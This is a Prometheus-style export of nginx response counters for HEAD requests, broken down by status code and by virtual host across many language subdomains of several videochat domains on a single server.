nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sl.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.date"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sr.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="su.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sv.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sw.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ta.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="te.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.cafe"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tg.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.mx"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="th.videochat.world"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.cafe"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tl.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tr.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="tt.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="udm.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uk.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ur.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.tv.br"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="uz.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="vi.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.cafe"} 1230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.date"} 1244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.mx"} 1229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.show"} 1302 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.tv.br"} 1241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="videochat.world"} 1469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="xh.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="yi.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="zh.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="301",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="301",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="161.97.120.25"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="161.97.120.25:80"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="af.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="al.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="am.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ar.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ar.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="az.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ba.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="be.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="be.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="be.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.cafe"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bg.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bn.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bs.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="bs.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ca.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ca.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ceb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="chm.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cs.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cs.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="cy.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="da.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="de.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ee.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ee.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="el.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="el.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eo.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="es.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="es.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="es.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="et.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eu.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="eu.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fa.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fa.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="fr.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ga.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ga.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gl.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="gu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="he.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hi.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hr.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="hu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="id.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="id.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="is.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="is.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="it.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jp.videochat.date"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jp.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="jv.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ka.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="km.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="km.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kn.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="kn.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ko.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ko.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ky.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lo.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lv.videochat.date"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="lv.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mg.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mk.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ml.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ml.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mr.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mr.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ms.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="mt.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="my.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="my.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ne.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="nl.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="nl.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="nl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.cafe"} 100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="no.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pa.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pap.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pap.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pl.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="pt.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ro.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ro.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ro.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sco.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sco.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sl.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.mx"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sr.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="su.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="su.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="sv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="ta.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="te.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.tv.br"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="tg.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="302",vhost="th.videochat.cafe"} 35 